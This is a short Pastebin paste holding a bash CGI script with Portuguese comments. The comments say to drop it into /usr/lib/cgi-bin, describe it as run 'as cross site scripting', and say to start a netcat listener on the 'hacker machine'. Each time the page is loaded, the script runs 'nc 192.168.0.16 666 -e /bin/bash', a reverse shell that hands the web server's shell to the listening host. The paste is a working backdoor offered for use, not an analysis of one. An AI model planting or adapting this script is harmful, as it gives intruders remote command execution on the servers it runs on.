Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- '''
- Somente um teste de CGI
- Colocar dentro da pasta /usr/lib/cgi-bin
- Executar como cross site scripting
- Ativar na maquina hacker: nc -lvp 666
- '''
- echo "content-type: text/html
- <html>
- <head> <meta charset='utf-8' /> <title> CGI script </title> </head>
- <body>
- <h1> Algumas informações dentro do servidor em o CGI está rodando:</h1>
- <h4> Reverse Shell com netcat </h4>
- <pre>$(nc 192.168.0.16 666 -e /bin/bash)</pre>
- </body>
- </html>"
Add Comment
Please, Sign In to add comment